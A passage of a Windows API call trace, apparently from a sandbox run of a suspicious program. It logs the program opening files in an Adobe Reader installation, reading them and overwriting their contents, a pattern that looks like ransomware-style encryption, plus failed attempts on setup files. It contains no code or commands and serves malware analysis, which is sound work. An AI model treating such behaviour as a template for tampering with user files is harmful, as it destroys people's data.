[0117.544] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0117.545] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0117.545] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x123c [0117.545] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0117.545] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.546] ReleaseMutex (hMutex=0x168) returned 1 [0117.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="usa.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0117.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="usa.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac9c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="usa.fca", lpUsedDefaultChar=0x0) returned 7 [0117.546] ReadFile (in: hFile=0x1d8, lpBuffer=0x2866a88, nNumberOfBytesToRead=0x123c, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesRead=0x2d5f2bc*=0x123c, lpOverlapped=0x0) returned 1 [0118.198] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0118.198] WriteFile (in: hFile=0x1d8, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x17c4, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x17c4, lpOverlapped=0x0) returned 1 [0118.198] CloseHandle (hObject=0x1d8) returned 1 [0118.199] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\Japanese83pv.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\japanese83pv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0118.200] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0118.200] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x3229c [0118.200] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0118.200] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.200] ReleaseMutex (hMutex=0x168) returned 1 [0118.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Japanese83pv.txt", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0118.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Japanese83pv.txt", cchWideChar=16, lpMultiByteStr=0x1f88a64, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Japanese83pv.txt", lpUsedDefaultChar=0x0) returned 16 [0118.200] ReadFile (in: hFile=0x1d8, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.292] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3129c [0118.292] ReadFile (in: hFile=0x1d8, lpBuffer=0x2693be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.323] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3129c [0118.323] WriteFile (in: hFile=0x1d8, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.323] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0118.323] WriteFile (in: hFile=0x1d8, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.324] CloseHandle (hObject=0x1d8) returned 1 [0119.400] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINTRAD.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chintrad.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0119.402] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0119.402] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x520b7 [0119.402] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0119.402] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.402] ReleaseMutex (hMutex=0x168) returned 1 [0119.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHINTRAD.TXT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0119.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHINTRAD.TXT", cchWideChar=12, lpMultiByteStr=0x1f7356c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHINTRAD.TXT", lpUsedDefaultChar=0x0) returned 12 [0119.402] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0119.405] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x510b7 [0119.405] ReadFile (in: hFile=0x1dc, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.406] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x510b7 [0119.407] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0119.407] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0119.407] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0119.407] CloseHandle (hObject=0x1dc) returned 1 [0119.407] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\JAPANESE.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\japanese.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0119.408] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0119.408] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x320dc [0119.408] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0119.408] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.408] ReleaseMutex (hMutex=0x168) returned 1 [0119.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JAPANESE.TXT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0119.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JAPANESE.TXT", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JAPANESE.TXT", lpUsedDefaultChar=0x0) returned 12 [0119.409] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0119.411] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x310dc [0119.411] ReadFile (in: hFile=0x1dc, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.412] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x310dc [0119.412] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0119.412] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0119.413] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0119.413] CloseHandle (hObject=0x1dc) returned 1 [0119.413] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1250.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1250.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0119.414] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0119.414] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2664 [0119.414] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0119.414] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.414] ReleaseMutex (hMutex=0x168) returned 1 [0119.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1250.TXT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1250.TXT", cchWideChar=10, lpMultiByteStr=0x1f7356c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CP1250.TXT", lpUsedDefaultChar=0x0) returned 10 [0119.415] ReadFile (in: hFile=0x1dc, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.421] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1664 [0119.749] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.749] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1664 [0119.750] WriteFile (in: hFile=0x1dc, lpBuffer=0x286f588*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x286f588*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0124.222] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0124.223] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0124.223] CloseHandle (hObject=0x1dc) returned 1 [0124.223] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1258.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1258.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0124.225] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0124.225] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2522 [0124.225] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0124.225] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0124.225] ReleaseMutex (hMutex=0x168) returned 1 [0124.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1258.TXT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0124.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1258.TXT", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CP1258.TXT", lpUsedDefaultChar=0x0) returned 10 [0124.225] ReadFile (in: hFile=0x1dc, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.186] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1522 [0127.186] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.261] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1522 [0127.261] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0127.262] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0127.262] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0127.262] CloseHandle (hObject=0x1dc) returned 1 [0127.263] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1029.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1029.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.264] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1029.mst", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1029.mst", lpFilePart=0x2d5f690*="1029.mst") returned 0x64 [0127.264] GetLastError () returned 0x5 [0127.264] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0127.264] LocalFree (hMem=0x69e2b0) returned 0x0 [0127.264] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0127.264] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0127.267] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0127.267] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0127.268] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1029.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1029.mst")) returned 0x21 [0127.268] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1040.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1040.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.269] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1040.mst", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1040.mst", lpFilePart=0x2d5f690*="1040.mst") returned 0x64 [0127.269] GetLastError () returned 0x5 [0127.269] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0127.269] LocalFree (hMem=0x69e2b0) returned 0x0 [0127.269] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0127.269] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0127.269] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0127.270] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0127.270] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1040.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1040.mst")) returned 0x21 [0127.270] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1049.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1049.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.270] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1049.mst", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1049.mst", lpFilePart=0x2d5f690*="1049.mst") returned 0x64 [0127.271] GetLastError () returned 0x5 [0127.271] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0127.271] LocalFree (hMem=0x69e2b0) returned 0x0 [0127.271] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0127.271] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0127.271] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0127.272] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0127.272] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1049.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1049.mst")) returned 0x21 [0127.272] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\2052.mst" 